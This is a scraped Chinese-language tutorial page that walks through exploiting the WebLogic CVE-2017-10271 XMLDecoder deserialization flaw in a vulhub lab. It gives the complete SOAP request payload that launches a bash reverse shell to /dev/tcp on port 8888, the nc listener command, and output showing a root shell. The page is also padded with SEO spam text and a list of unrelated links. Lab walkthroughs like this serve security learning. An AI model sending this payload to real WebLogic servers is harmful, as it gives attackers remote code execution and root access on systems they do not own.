当前位置: 首页 > news >正文

免费发布推广信息网站站长网

免费发布推广信息网站,站长网,北京建网站的价格,网站防止被采集漏洞成因 Weblogic的WLS Security组件对外提供 webservice服务 其中使用了XMLDecoder来 解析用户传入的XML数据 在解析的过程中出现 反序列化漏洞 ,导致可执行任意命令 原理:https://xz.aliyun.com/t/10172 靶场部署 1.进入靶场目录 cd /vulhub-maste…

漏洞成因

Weblogic的WLS Security组件对外提供 webservice服务

其中使用了XMLDecoder来 解析用户传入的XML数据

在解析的过程中出现 反序列化漏洞 ,导致可执行任意命令
原理:https://xz.aliyun.com/t/10172

靶场部署

1.进入靶场目录

cd /vulhub-master/weblogic/CVE-2017-10271

2.开启靶场【报错重启docker服务】

[root@localhost CVE-2017-10271]# docker-compose up -d
 
3.查看靶场端口

[root@localhost CVE-2017-10271]# docker ps

 4.访问靶场

192.168.10.5:7001

漏洞利用

1.漏洞发生页

192.168.10.5:7001/wls-wsat/CoordinatorPortType

2.配置poc

192.168.10.5 改成你的CentOS IP
192.168.10.128 改成你的Kali IP
8888 改成你的Kali监听端口

==========从以下内容开始复制==========
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.10.5:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 640

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.10.128/8888 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

3.kali监听 8888 端口

nc -lvp 8888

4.bp发送poc请求包

修改右上角 Target

 

 粘贴并发送

5.连接建立成功

 

┌──(root㉿kali)-[~]
└─# nc -lvp 8888
listening on [any] 8888 ...
192.168.10.5: inverse host lookup failed: Unknown host
connect to [192.168.10.128] from (UNKNOWN) [192.168.10.5] 45432
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@af29889df405:~/Oracle/Middleware/user_projects/domains/base_domain# 

http://www.yayakq.cn/news/801384/

相关文章:

  • 怎么注册网站平台淮南先锋网
  • 哪些网站可以免费做简历怎么查网站是谁建的
  • 网站开发报酬网页设计师报名官网
  • 南充外贸网站建设营销手机系统安装
  • c 网站开发htnl网站建设公司推荐理由
  • 免费网站空间女人只做正品的网站
  • 商城网站具体需求北京建筑总公司
  • 网站空间买多大的做网站公司是干什么的
  • 做效果图的素材网站wordpress置顶失败
  • 网站分几类wordpress 上注册用户
  • 网站开发使用的语言类应用商店下载软件
  • 做照片书网站好dw可以做视频网站么
  • 免费网站建设可信赖个人怎么做购物网站
  • 网站上的搜索怎么做wordpress cdn 阿里云
  • 培训行业seo整站优化查看别人网站的访问量
  • 小米的网站建设的要点免费在线观看电影大全
  • 机械东莞网站建设公司网站做的太难看
  • 网站开发品牌建设工程规划许可证网站
  • 网站建设商业计划书网站建设职业情况
  • 建设银行信用卡网站登录怎么做会员自动售卡网站
  • 怎么样可以做网站凡客家具
  • 网站开发项目架构说明书golang wordpress
  • 可信赖的手机网站设计网站建设平台怎么样
  • 北京建站模板系统北京网站设计公司cg成都柚米科技15
  • 沈阳建站程序门户网站的含义
  • 龙岗网站注册怎么用dw网站怎么建设
  • 银行网站开发技术方案下载 asp 网站源码
  • 网站建设有什么意义wordpress huxiu
  • 四川林峰脉建设工程有限公司网站网站建设协议书
  • 上饶网站建设企业无锡 网站开发